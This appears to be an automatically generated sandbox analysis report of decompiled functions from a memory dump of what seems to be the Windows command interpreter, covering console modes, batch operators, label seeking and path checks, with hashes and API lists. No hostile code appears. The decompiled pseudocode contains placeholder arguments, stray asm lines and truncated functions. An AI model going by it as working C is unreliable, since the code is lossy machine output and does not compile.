.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC, xrefs: 4A746963
KEYS, xrefs: 4A73873C
PATH, xrefs: 4A7386F1, 4A7386F6
COMSPEC, xrefs: 4A73872A, 4A7469CB
PROMPT, xrefs: 4A738717, 4A73871C, 4A73BD3F
PATHEXT, xrefs: 4A738704, 4A738709, 4A746968
$P$G, xrefs: 4A73BD3A

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Heap$AllocEnvironmentFileModuleNameProcessVariable_wcsicmp_wcsupr
String ID: $P$G$.COM;.EXE;.BAT;.CMD;.VBS;.JS;.WS;.MSC$COMSPEC$KEYS$PATH$PATHEXT$PROMPT$\CMD.EXE
API String ID: 4117198927-4197029667
Opcode ID: f81a20440d6685598dd58e1b8e5f12a5ee33318ba3fc632af96dd70708a4a2a4
Instruction ID: 1487f4a9b32b7accf7b2aa36aedf10e89fea7427a81acb644cab39f254ec4962
Opcode Fuzzy Hash: f81a20440d6685598dd58e1b8e5f12a5ee33318ba3fc632af96dd70708a4a2a4
Instruction Fuzzy Hash: 8821E16120E91375A6702365CD88EFF1B6A9FD16A2B030018FA41DD843EBACD90DC7A6

Uniqueness

Uniqueness Score: -1.00%

Function 4A731605, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E4A731605() {
				int _t7;
				signed int _t8;
				signed int _t10;
				signed int _t14;
				intOrPtr* _t27;

				_t27 = __imp___get_osfhandle;
				SetConsoleMode( *_t27( *0x4a7541ac), 1);
				_push(0x4a7541ac);
				if(GetConsoleMode( *_t27(), 1) != 0) {
					_t14 =  *0x4a7541ac; // 0x0
					if((_t14 & 0x00000003) != 3) {
						 *0x4a7541ac =  *0x4a7541ac | 0x00000003;
						SetConsoleMode( *_t27( *0x4a7541ac), 1);
					}
				}
				_t7 = GetConsoleMode( *_t27(0x4a7541b0), 0);
				if(_t7 == 0) {
					L7:
					return _t7;
				} else {
					_t8 =  *0x4a7541b0; // 0x0
					if((_t8 & 0x00000007) != 7 || (_t8 & 0x00000010) != 0) {
						_t10 = _t8 & 0xffffffef | 0x00000007;
						 *0x4a7541b0 = _t10;
						SetConsoleMode( *_t27(_t10), 0);
					}
					_t7 =  *0x4a7541f4; // 0x0
					if(_t7 == 0) {
						goto L7;
					} else {
						return  *_t7(L"CMD.EXE");
					}
				}
			}

0x4a731609
0x4a731622
0x4a731624
0x4a731639
0x4a73163b
0x4a731645
0x4a738d8d
0x4a738da0
0x4a738da0
0x4a731645
0x4a731656
0x4a73165a
0x4a73168a
0x4a73168a
0x4a73165c
0x4a73165c
0x4a731669
0x4a73bc32
0x4a73bc38
0x4a73bc41
0x4a73bc41
0x4a731677
0x4a73167e
0x00000000
0x4a731680
0x00000000
0x4a731685
0x4a73167e

APIs

_get_osfhandle.MSVCRT ref: 4A731618
SetConsoleMode.KERNEL32 ref: 4A731622
_get_osfhandle.MSVCRT ref: 4A73162B
GetConsoleMode.KERNEL32 ref: 4A731635
_get_osfhandle.MSVCRT ref: 4A731652
GetConsoleMode.KERNEL32 ref: 4A731656
_get_osfhandle.MSVCRT ref: 4A738D9C
SetConsoleMode.KERNEL32 ref: 4A738DA0

Strings

CMD.EXE, xrefs: 4A731680

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: ConsoleMode_get_osfhandle
String ID: CMD.EXE
API String ID: 1606018815-3025314500
Opcode ID: 0586598abc18660c383b2b9b64db99dd90e236fe1572be3ff0c4e91ea6b2832a
Instruction ID: 3bdf965fbbfb45253a4e462e9e816a3c438c471fa9128f05c5765f7dfea3b6da
Opcode Fuzzy Hash: 0586598abc18660c383b2b9b64db99dd90e236fe1572be3ff0c4e91ea6b2832a
Instruction Fuzzy Hash: 881186B3ED5625AEFE3067F5DC16F662FBDD7922A0F060416E201C6881DEA5DC04CB60

Uniqueness

Uniqueness Score: -1.00%

Function 4A7379A4, Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 146memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C), ref: 4A7379E8
HeapAlloc.KERNEL32(00000000), ref: 4A7379F1
GetProcessHeap.KERNEL32(00000008,?), ref: 4A737A05
HeapAlloc.KERNEL32(00000000), ref: 4A737A08
_wcsicmp.MSVCRT ref: 4A737AA2

Strings

ENABLEDELAYEDEXPANSION, xrefs: 4A73DABF
ENABLEEXTENSIONS, xrefs: 4A737A9C
DISABLEDELAYEDEXPANSION, xrefs: 4A740F71
DISABLEEXTENSIONS, xrefs: 4A73DAAD

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess$_wcsicmp
String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
API String ID: 3463597064-3086019870
Opcode ID: e0c16eab2e8cf020e16ba0685142f173d04d13243c1a5e5f25f21b9167f1be6f
Instruction ID: 7da51cf8ad767c797c13eb494ea3d58caa5e4e1892be22d01df29c88d0055471
Opcode Fuzzy Hash: e0c16eab2e8cf020e16ba0685142f173d04d13243c1a5e5f25f21b9167f1be6f
Instruction Fuzzy Hash: CF4116B264C612AFE374DF68C8419563FFDEB46310B120469E645CBA43EB24DE08DB25

Uniqueness

Uniqueness Score: -1.00%

Function 4A736262, Relevance: 18.1, APIs: 6, Strings: 6, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E4A736262(void* __eflags, intOrPtr* _a4) {
				intOrPtr _t15;
				intOrPtr* _t18;
				intOrPtr _t19;
				intOrPtr _t20;
				intOrPtr* _t32;
				intOrPtr* _t33;
				intOrPtr _t46;
				intOrPtr _t48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t52;

				_t15 = E4A733D56(0);
				_t32 = _a4;
				_t51 = 4;
				 *((intOrPtr*)(_t32 + 0x38)) = _t15;
				if(E4A731CBF(_t51) != 0x4000) {
					E4A74EE72();
				}
				_t33 = E4A736304;
				_t18 = 0x4a768640;
				while(1) {
					_t48 =  *_t18;
					if(_t48 !=  *_t33) {
						break;
					}
					if(_t48 == 0) {
						L14:
						_t18 = 0;
						L5:
						if(_t18 == 0) {
							L1:
							_t19 = E4A733D56(0);
							 *((intOrPtr*)(_t32 + 0x3c)) = _t19;
							return _t19;
						}
						_t20 =  *0x4a754178; // 0x0
						if(_t20 >= _t51 &&  *0x4a768640 == 0x3d &&  *0x4a768642 == 0x3d) {
							 *((intOrPtr*)(_t32 + 0x3c)) = E4A732041(_t20 + _t20 - 4);
							_t46 =  *0x4a754178; // 0x0
							return E4A73185A(_t30, _t46 + 0xfffffffe, 0x4a768644);
						}
						if( *0x4a754081 == 0) {
							return E4A74EE72();
						} else {
							_t52 = __imp___wcsicmp;
							_push("EQU");
							_push(0x4a768640);
							if( *_t52() == 0) {
								 *((intOrPtr*)(_t32 + 0x44)) = 1;
							} else {
								_push("NEQ");
								_push(0x4a768640);
								if( *_t52() == 0) {
									 *((intOrPtr*)(_t32 + 0x44)) = 2;
								} else {
									_push("LSS");
									_push(0x4a768640);
									if( *_t52() == 0) {
										 *((intOrPtr*)(_t32 + 0x44)) = 3;
									} else {
										_push("LEQ");
										_push(0x4a768640);
										if( *_t52() == 0) {
											 *((intOrPtr*)(_t32 + 0x44)) = 4;
										} else {
											_push("GTR");
											_push(0x4a768640);
											if( *_t52() != 0) {
												_push("GEQ");
												_push(0x4a768640);
												if( *_t52() != 0) {
													E4A74EE72();
												} else {
													 *((intOrPtr*)(_t32 + 0x44)) = 6;
												}
											} else {
												 *((intOrPtr*)(_t32 + 0x44)) = 5;
											}
										}
									}
								}
							}
							 *_t32 = 0x3a;
							goto L1;
						}
					}
					_t49 =  *((intOrPtr*)(_t18 + 2));
					_t8 = _t33 + 2; // 0x3d
					if(_t49 !=  *_t8) {
						break;
					}
					_t18 = _t18 + _t51;
					_t33 = _t33 + _t51;
					if(_t49 != 0) {
						continue;
					}
					goto L14;
				}
				asm("sbb eax, eax");
				asm("sbb eax, 0xffffffff");
				goto L5;
			}

0x4a73626c
0x4a736271
0x4a736276
0x4a736278
0x4a736285
0x4a747d87
0x4a747d87
0x4a736290
0x4a736295
0x4a736297
0x4a736297
0x4a73629d
0x00000000
0x00000000
0x4a736339
0x4a736356
0x4a736356
0x4a7362a8
0x4a7362aa
0x4a735404
0x4a735406
0x4a73540b
0x00000000
0x4a73540b
0x4a7362b0
0x4a7362b7
0x4a7362e3
0x4a7362e6
0x00000000
0x4a7362f6
0x4a73d9c4
0x00000000
0x4a73d9ca
0x4a73d9ca
0x4a73d9d0
0x4a73d9d5
0x4a73d9dc
0x4a73da5c
0x4a73d9de
0x4a73d9de
0x4a73d9e3
0x4a73d9ea
0x4a73da65
0x4a73d9ec
0x4a73d9ec
0x4a73d9f1
0x4a73d9f8
0x4a73f3ee
0x4a73d9fe
0x4a73d9fe
0x4a73da03
0x4a73da0a
0x4a73f462
0x4a73da10
0x4a73da10
0x4a73da15
0x4a73da1c
0x4a74040e
0x4a740413
0x4a74041a
0x4a740428
0x4a74041c
0x4a74041c
0x4a74041c
0x4a73da22
0x4a73da22
0x4a73da22
0x4a73da1c
0x4a73da0a
0x4a73d9f8
0x4a73d9ea
0x4a73da29
0x00000000
0x4a73da29
0x4a73d9c4
0x4a73633b
0x4a73633f
0x4a736343
0x00000000
0x00000000
0x4a736349
0x4a73634b
0x4a736350
0x00000000
0x00000000
0x00000000
0x4a736350
0x4a7362a3
0x4a7362a5
0x00000000

Strings

NEQ, xrefs: 4A73D9DE
LSS, xrefs: 4A73D9EC
LEQ, xrefs: 4A73D9FE
GTR, xrefs: 4A73DA10
GEQ, xrefs: 4A74040E
EQU, xrefs: 4A73D9D0

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID:
String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
API String ID: 0-3124875276
Opcode ID: 8e7d65a66348eb5cde589623655a034a470fae4b6408a02629212160d181f506
Instruction ID: 401a9e84bc9d075f27c8bdcf25959e8d5b906884143ef6f8033b277e8a6ed8bb
Opcode Fuzzy Hash: 8e7d65a66348eb5cde589623655a034a470fae4b6408a02629212160d181f506
Instruction Fuzzy Hash: 133145B121CA12A6E7B49BA1DD84B977FA8DB426B0F03841BD600CE183FB75C84CC711

Uniqueness

Uniqueness Score: -1.00%

Function 4A736447, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E4A736447(void* __edx, LONG* _a4) {
				signed int _v8;
				char _v264;
				char _v520;
				long _v524;
				int _v528;
				short* _v532;
				int _v536;
				int _v540;
				long _v544;
				LONG* _v548;
				short* _v552;
				signed int _v556;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t58;
				void* _t70;
				void* _t74;
				void* _t77;
				short* _t84;
				short* _t85;
				void* _t86;
				char* _t91;
				void* _t99;
				long _t102;
				void* _t111;
				int _t117;
				void* _t121;
				intOrPtr _t122;
				intOrPtr* _t124;
				short* _t126;
				int _t135;
				signed int _t136;
				void* _t137;
				intOrPtr _t142;

				_t121 = __edx;
				_t58 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t58 ^ _t136;
				_t123 = _a4;
				_t122 =  *0x4a7540b4; // 0x0
				_t61 = 1;
				_v548 = _t123;
				_v536 = 1;
				_v540 = 0;
				if(_t122 == 0) {
					L8:
					return E4A7313A9(_t61, 0, _v8 ^ _t136, _t121, _t122, _t123);
				}
				_t107 = _t123[0xf];
				if(_t123[0xf] == 0) {
					E4A7357F4(1, _t122);
					_push(0);
					_push(0x2330);
					 *0x4a7540b4 =  *((intOrPtr*)(_t122 + 0x110));
					E4A736D44(_t107);
					L38:
					_t61 = 1;
					goto L8;
				}
				E4A73654D(_t107,  &_v264, 0x80, 1);
				_v556 =  *(_t122 + 8);
				_t70 = E4A734D4E(_t122);
				_v524 = _t70;
				if(_t70 == 0xffffffff) {
					goto L38;
				}
				__imp___get_osfhandle(0);
				_v544 = GetFileSize(_t70, _t70);
				_t72 = E4A732B0D(_t123[0xf], 0);
				_t123 = _t72;
				_t142 =  *0x4a754081; // 0x0
				if(_t142 == 0) {
					while(1) {
						L22:
						E4A734B2A(_t72);
						_t124 = __imp___get_osfhandle;
						_t74 =  *_t124(_v524, 0, 0, 1);
						_pop(_t111);
						_t75 = SetFilePointer(_t74, ??, ??, ??);
						 *(_t122 + 8) = _t75;
						if(_t75 >= _v556 && _v536 == 0) {
							break;
						}
						_t77 =  *_t124(_v524, 0x4a768640, 0x200,  &_v528);
						_pop(_t111);
						_push(_t77);
						if(E4A7367D3() == 0) {
							break;
						}
						_t75 = _v528;
						if(_t75 == 0) {
							L32:
							if(_v536 == 0) {
								L39:
								E4A7357F4(_t75, _t122);
								 *0x4a7540b4 =  *((intOrPtr*)(_t122 + 0x110));
								_t123 = 1;
								E4A736D44(_t111, 0x400023ab, 1,  &_v264);
								_v540 = 1;
								L7:
								E4A733AB3(_v524);
								_t61 = _v540;
								goto L8;
							}
							_t72 = SetFilePointer( *_t124(0), _v524, 0, 0);
							_v536 = 0;
							continue;
						}
						if(_t75 == 0xffffffff ||  *0x4a768640 == 0 || _v264 == 0) {
							break;
						} else {
							0x4a768640[_t75] = 0;
							_t126 = E4A7318EB(0x4a768640, 0x3a);
							if(_t126 == 0) {
								continue;
							} else {
								goto L30;
							}
							do {
								L30:
								_t84 = _t126;
								while(1) {
									_v532 = _t84;
									if( *_t84 == 0xa) {
										break;
									}
									if(_t84 == 0x4a768640) {
										break;
									}
									_t84 = _t84;
								}
								if( *_t84 != 0x3a) {
									_v532 = _t84;
								}
								_t85 = E4A732B0D(_t84, 0);
								_v552 = _t85;
								if( *_t85 == 0x3a) {
									_t86 = E4A7318EB(_v532, 0xa);
									_t123 = _t86;
									if(_t123 == 0) {
										__imp___get_osfhandle(1);
										if(SetFilePointer(_t86, _v524, 0, 0) == _v544) {
											goto L10;
										}
										_t117 = _v528;
										if(_t117 == 0x200) {
											goto L10;
										}
										_t135 = _t117 - (_v532 - 0x4a768640 >> 1);
										_t99 = E4A73661C();
										if(_t99 != 0) {
											_t99 = WideCharToMultiByte( *0x4a7541b8, 0, 0x4a768640, _t135, 0, 0, 0, 0);
											_t135 = _t99;
										}
										_t123 =  ~_t135;
										__imp___get_osfhandle(1);
										_t72 = SetFilePointer(_t99, _v524,  ~_t135, 0);
										break;
									}
									L10:
									E4A73654D(_v552,  &_v520, 0x80, 0);
									_t91 =  &_v264;
									__imp___wcsicmp(_t91,  &_v520);
									if(_t91 != 0) {
										goto L20;
									}
									 *0x4a7540b8 = _v548[0x10] & 0x00000001;
									_t72 = E4A73661C();
									if(_t123 == 0) {
										if(_t72 == 0) {
											_t72 = _v528;
											L50:
											 *(_t122 + 8) =  *(_t122 + 8) + _t72;
											break;
										}
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(_v528);
										_push(0x4a768640);
										L49:
										_t72 = WideCharToMultiByte( *0x4a7541b8, 0, ??, ??, ??, ??, ??, ??);
										goto L50;
									}
									if(_t72 != 0) {
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(_t123);
										_push(0x4a768640);
										goto L49;
									}
									 *(_t122 + 8) = _t123 +  *(_t122 + 8);
									break;
								}
								L20:
								_t126 = E4A7318EB(_t123, 0x3a);
							} while (_t126 != 0);
							if( *0x4a7540b8 == 1) {
								goto L7;
							}
							continue;
						}
					}
					if(_v528 != 0) {
						goto L39;
					}
					goto L32;
				}
				__imp___wcsnicmp(_t123, L":EOF", 4);
				_t137 = _t137 + 0xc;
				if(_t72 != 0) {
					goto L22;
				}
				_t102 = _t123[2] & 0x0000ffff;
				if(_t102 != 0) {
					if(iswspace(_t102) != 0) {
						goto L6;
					}
					goto L22;
				}
				L6:
				 *(_t122 + 8) = _v544;
				 *0x4a7540b8 = 1;
				goto L7;
			}

0x4a736447
0x4a736452
0x4a736459
0x4a73645e
0x4a736464
0x4a73646c
0x4a73646d
0x4a736473
0x4a736479
0x4a736481
0x4a736537
0x4a736545
0x4a736545
0x4a736487
0x4a73648c
0x4a7446fe
0x4a744709
0x4a74470a
0x4a74470f
0x4a744714
0x4a7401d6
0x4a7401d8
0x00000000
0x4a7401d8
0x4a7364a0
0x4a7364a9
0x4a7364af
0x4a7364b4
0x4a7364bd
0x00000000
0x00000000
0x4a7364c5
0x4a7364d7
0x4a7364dd
0x4a7364e2
0x4a7364e4
0x4a7364ea
0x4a736716
0x4a736716
0x4a736716
0x4a73671b
0x4a73672b
0x4a73672d
0x4a73672f
0x4a73673b
0x4a73673e
0x00000000
0x00000000
0x4a736763
0x4a736765
0x4a736766
0x4a73676e
0x00000000
0x00000000
0x4a736774
0x4a73677c
0x4a73f406
0x4a73f40c
0x4a7401de
0x4a7401df
0x4a7447cd
0x4a7447db
0x4a7447e2
0x4a7447ea
0x4a736526
0x4a73652c
0x4a736531
0x00000000
0x4a736531
0x4a73f41f
0x4a73f425
0x00000000
0x4a73f425
0x4a736785
0x00000000
0x4a7367a5
0x4a7367ae
0x4a7367bb
0x4a7367bf
0x00000000
0x00000000
0x00000000
0x00000000
0x4a7367c5
0x4a7367c5
0x4a7367c5
0x4a7366c6
0x4a7366ca
0x4a7366d0
0x00000000
0x00000000
0x4a7366c2
0x00000000
0x00000000
0x4a7366c5
0x4a7366c5
0x4a7366d6
0x4a7366da
0x4a7366da
0x4a7366e2
0x4a7366eb
0x4a7366f1
0x4a736648
0x4a73664d
0x4a736651
0x4a7401b7
0x4a7401cb
0x00000000
0x00000000
0x4a744720
0x4a74472c
0x00000000
0x00000000
0x4a744741
0x4a744743
0x4a74474a
0x4a74475d
0x4a744763
0x4a744763
0x4a744768
0x4a744771
0x4a744779
0x00000000
0x4a744779
0x4a736657
0x4a73666a
0x4a736676
0x4a73667d
0x4a736687
0x00000000
0x00000000
0x4a736694
0x4a736699
0x4a7366a0
0x4a744786
0x4a744799
0x4a7447bf
0x4a7447bf
0x00000000
0x4a7447bf
0x4a744788
0x4a744789
0x4a74478a
0x4a74478b
0x4a74478c
0x4a744792
0x4a7447b2
0x4a7447b9
0x00000000
0x4a7447b9
0x4a7366a8
0x4a7447a1
0x4a7447a9
0x4a7447ab
0x4a7447ad
0x4a7447b0
0x4a7447b1
0x00000000
0x4a7447b1
0x4a7366b8
0x00000000
0x4a7366b8
0x4a7366f7
0x4a7366ff
0x4a736701
0x4a736710
0x00000000
0x00000000
0x00000000
0x4a736710
0x4a736785
0x4a73f400
0x00000000
0x00000000
0x00000000
0x4a73f400
0x4a7364f8
0x4a7364fe
0x4a736503
0x00000000
0x00000000
0x4a736509
0x4a736510
0x4a73f6d1
0x00000000
0x00000000
0x00000000
0x4a73f6d7
0x4a736516
0x4a73651c
0x4a73651f
0x00000000

APIs

Part of subcall function 4A734D4E: _get_osfhandle.MSVCRT ref: 4A734D79
Part of subcall function 4A734D4E: SetFilePointer.KERNEL32(00000000,4A734C54,00000000,00000000,00000104,00000000,00000114), ref: 4A734D81

_get_osfhandle.MSVCRT ref: 4A7364C5
GetFileSize.KERNEL32(00000000), ref: 4A7364CD

Part of subcall function 4A732B0D: iswspace.MSVCRT ref: 4A732B1F

_wcsnicmp.MSVCRT ref: 4A7364F8
_get_osfhandle.MSVCRT ref: 4A73672B
SetFilePointer.KERNEL32(00000000), ref: 4A73672F
_get_osfhandle.MSVCRT ref: 4A736763
iswspace.MSVCRT ref: 4A73F6C8

Part of subcall function 4A733AB3: _close.MSVCRT ref: 4A733AED

Strings

:EOF, xrefs: 4A7364F2

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: _get_osfhandle$File$Pointeriswspace$Size_close_wcsnicmp
String ID: :EOF
API String ID: 2298062502-551370653
Opcode ID: b975329302cabd82a2c5688ad9ed687d60e9f142877efa690db85bdcc5fb59ed
Instruction ID: 5c265b5273fe7fc8b416e5ba05451495d9c3250c64864fa0a207b7ad20a0fcae
Opcode Fuzzy Hash: b975329302cabd82a2c5688ad9ed687d60e9f142877efa690db85bdcc5fb59ed
Instruction Fuzzy Hash: 175106B1909629AFDF709F60CDC8AEEBBBDEB05350F1201A5E505DB542DB309E88CB50

Uniqueness

Uniqueness Score: -1.00%

Function 4A736A35, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E4A736A35(void* __ebx, void* __ecx, void* __edx, WCHAR* _a4) {
				signed int _v8;
				char _v1040;
				intOrPtr _v1042;
				short _v1044;
				short _v1046;
				short _v1048;
				char _v1640;
				WCHAR* _v1644;
				char _v1648;
				void* __edi;
				void* __esi;
				signed int _t24;
				signed int _t26;
				wchar_t* _t34;
				wchar_t* _t35;
				signed int _t36;
				short* _t41;
				void* _t51;
				signed int _t57;
				void* _t61;
				WCHAR* _t62;
				void* _t63;
				signed int _t64;
				signed int _t67;

				_t61 = __edx;
				_t51 = __ebx;
				_t24 =  *0x4a7540ac; // 0xbb40e64e
				_v8 = _t24 ^ _t67;
				_t62 = _a4;
				if(_t62 == 0) {
					_t26 = 0;
					L8:
					return E4A7313A9(_t26, _t51, _v8 ^ _t67, _t61, _t62, _t63);
				}
				_push(_t63);
				_t64 = GetFullPathNameW(E4A732598(__ecx, _t62), 0x208,  &_v1048,  &_v1644);
				if(_t64 == 0) {
					L6:
					_t26 = _t64;
					L7:
					_pop(_t63);
					goto L8;
				}
				if(wcsncmp( &_v1048, L"\\\\.\\", 4) == 0) {
					_t34 =  &_v1040;
					_v1644 = _t34;
					_t35 = wcsstr(_t62, _t34);
					_v1644 = _t35;
					if(_t35 == 0 || _t35 <= _t62) {
						_t36 = GetFileAttributesW(_t62);
						_t57 = _t36;
					} else {
						 *_t35 = 0;
						_t57 = GetFileAttributesW(_t62);
						 *_v1644 =  *_t35 & 0x0000ffff;
						_t36 = _t57;
					}
					asm("sbb eax, eax");
					_t26 =  ~(_t36 + 1) & _t57;
					goto L7;
				}
				_t41 = _v1644;
				if(_t41 == 0 ||  *_t41 == 0) {
					_t64 = 0 | GetFileAttributesW( &_v1048) != 0xffffffff;
				} else {
					_t64 = E4A733117( &_v1048, 0x37,  &_v1640,  &_v1648) & 0x000000ff;
					E4A732F5C(_v1648);
					if(_t64 == 0) {
						if(_v1046 == 0x5c || _v1046 == 0x3a && _v1044 == 0x5c && _v1042 == _t64) {
							if(GetDriveTypeW( &_v1048) <= 1) {
								goto L6;
							}
							_t64 = 1;
						}
					}
				}
			}

0x4a736a35
0x4a736a35
0x4a736a40
0x4a736a47
0x4a736a4b
0x4a736a50
0x4a749db6
0x4a736ae5
0x4a736af1
0x4a736af1
0x4a736a56
0x4a736a77
0x4a736a7b
0x4a736ae2
0x4a736ae2
0x4a736ae4
0x4a736ae4
0x00000000
0x4a736ae4
0x4a736a96
0x4a749dbd
0x4a749dc5
0x4a749dcb
0x4a749dd3
0x4a749ddb
0x4a749e00
0x4a749e06
0x4a749de1
0x4a749de7
0x4a749df0
0x4a749df8
0x4a749dfb
0x4a749dfb
0x4a749e0b
0x4a749e0d
0x00000000
0x4a749e0d
0x4a736a9c
0x4a736aa4
0x4a749e31
0x4a736ab4
0x4a736ad6
0x4a736ad9
0x4a736ae0
0x4a736b11
0x4a736b40
0x00000000
0x00000000
0x4a749e16
0x4a749e16
0x4a736b11
0x4a736ae0

APIs

GetFullPathNameW.KERNEL32(00000000,?,00000208,?,?), ref: 4A736A71
wcsncmp.MSVCRT(?,\\.\,00000004), ref: 4A736A8B
GetDriveTypeW.KERNEL32(?,?,?,00000037,?,?), ref: 4A736B37
wcsstr.MSVCRT ref: 4A749DCB
GetFileAttributesW.KERNEL32(?), ref: 4A749DEA
GetFileAttributesW.KERNEL32(?), ref: 4A749E23

Part of subcall function 4A732F5C: FindClose.KERNEL32(4A754210,?,4A7495B1,?,00000000,00000000,?,4A74FCAB,4A743723,4A76C642,4A731BBC,4A76C642,00002002,4A75C640,00000000,00000000), ref: 4A732F96

Strings

\, xrefs: 4A736B1D
:, xrefs: 4A736B13
\\.\, xrefs: 4A736A85

Memory Dump Source

Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true

Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp Download File

Similarity

API ID: AttributesFile$CloseDriveFindFullNamePathTypewcsncmpwcsstr
String ID: :$\$\\.\
API String ID: 3324058816-2289549094
Opcode ID: 02d7fd9f7c8b15fb8e9343e725c2523b30da5a6ad1f66af62416f191afaba84d
Instruction ID: 8dd089adc61da876357b1ad82b2c703c6262b6507cb1854f4e59c8a72548badc
Opcode Fuzzy Hash: 02d7fd9f7c8b15fb8e9343e725c2523b30da5a6ad1f66af62416f191afaba84d
Instruction Fuzzy Hash: 2E41D6B2D05528DBCF708B64CC85AEB7BBCAF45310F1241A6E505D7142EB71CE88CB64

Uniqueness

Uniqueness Score: -1.00%

Function 4A732CB4, Relevance: 16.6, APIs: 6, Strings: 5, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E4A732CB4(signed int __eax, void* __ecx, void* __esi) {
				signed char _t48;
				signed int _t52;
				signed int _t53;
				signed int _t54;
				signed int _t57;
				int _t58;
				int _t60;
				int _t62;
				signed int _t70;
				int _t71;
				int _t72;
				signed int _t74;
				void* _t75;
				void* _t76;
				void* _t78;
				int _t84;
				void* _t86;
				signed int _t87;
				long _t88;
				int _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				signed int _t93;

				_t91 = __esi;
				_t48 = __eax & 0x00007300;
				 *((intOrPtr*)(_t48 - 0x2e7bf0f0)) =  *((intOrPtr*)(_t48 - 0x2e7bf0f0)) + __ecx;
				if((_t48 & 0x00000010) != 0) {
					_t74 =  *(_t93 - 0x214);
					 *((short*)(_t93 + _t74 * 2 - 0x20c)) = 0;
				}
				_t87 = E4A7340F2(0x2a, _t93 - 0x20c,  *(_t93 - 0x218));
				 *(_t93 - 0x214) = _t87;
				if(_t87 == 0xffffffff) {
					_t52 = E4A7340F2(0x2d, _t93 - 0x20c,  *(_t93 - 0x218));
					__eflags = _t52 - 0x2d;
					if(_t52 != 0x2d) {
						goto L5;
					}
					goto L10;
				} else {
					if(_t87 == 0x14) {
						 *((intOrPtr*)(_t91 + 0x40)) = 1;
					}
					L5:
					 *(_t93 - 0x20d) = 0;
					 *((char*)(_t93 - 0x20e)) = 0;
					if(_t87 == 0xffffffff) {
						_t74 = 0;
						__eflags = 0;
						 *((char*)(_t93 - 0x20f)) = 0;
						do {
							_t53 =  *(_t91 + 0x38);
							_t88 =  *(_t53 + _t74 * 2) & 0x0000ffff;
							__eflags = _t88;
							if(_t88 == 0) {
								L24:
								 *((char*)(_t93 - 0x20f)) = 1;
								goto L22;
							}
							__eflags = _t88 - 0x22;
							if(_t88 == 0x22) {
								__eflags =  *(_t93 - 0x20d);
								_t70 = _t53 & 0xffffff00 |  *(_t93 - 0x20d) == 0x00000000;
								__eflags = _t70;
								 *(_t93 - 0x20d) = _t70;
								 *((char*)(_t93 - 0x20e)) = _t70 == 0;
							}
							__eflags =  *(_t93 - 0x20d);
							if( *(_t93 - 0x20d) != 0) {
								L21:
								_t74 = _t74 + 1;
								__eflags = _t74;
								 *((char*)(_t93 - 0x20e)) = 0;
								goto L22;
							}
							__eflags =  *((char*)(_t93 - 0x20e));
							if( *((char*)(_t93 - 0x20e)) != 0) {
								goto L21;
							}
							_t71 = iswspace(_t88);
							__eflags = _t71;
							if(_t71 != 0) {
								goto L24;
							}
							_t72 = E4A7318EB("=,;", _t88);
							__eflags = _t72;
							if(_t72 != 0) {
								goto L24;
							}
							__eflags = _t88 -  *0x4a77065c; // 0x2f
							if(__eflags == 0) {
								goto L24;
							}
							goto L21;
							L22:
							__eflags =  *((char*)(_t93 - 0x20f));
						} while ( *((char*)(_t93 - 0x20f)) == 0);
					}
					_t54 =  *(_t91 + 0x38);
					_t86 = _t54 + 2;
					do {
						_t78 =  *_t54;
						_t54 = _t54 + 2;
					} while (_t78 != 0);
					_t57 = _t54 - _t86 >> 1;
					if(_t74 != _t57) {
						_t89 = _t57 + 1;
						_t58 =  *(_t91 + 0x3c);
						__eflags = _t58;
						if(_t58 == 0) {
							L32:
							_t60 = E4A732041(_t89 + _t89);
							_t75 = _t74 + _t74;
							 *(_t93 - 0x218) = _t60;
							E4A73185A(_t60, _t89,  *(_t91 + 0x38) + _t75);
							_t62 =  *(_t91 + 0x3c);
							__eflags = _t62;
							if(_t62 != 0) {
								E4A7320A9(_t91,  *(_t93 - 0x218), _t89, _t62);
							}
							 *(_t91 + 0x3c) =  *(_t93 - 0x218);
							 *((short*)(_t75 +  *(_t91 + 0x38))) = 0;
							goto L9;
						}
						_t37 = _t58 + 2; // 0x4a754212
						_t86 = _t37;
						do {
							_t84 =  *_t58;
							_t58 = _t58 + 2;
							__eflags = _t84;
						} while (_t84 != 0);
						__eflags = _t89;
						goto L32;
					}
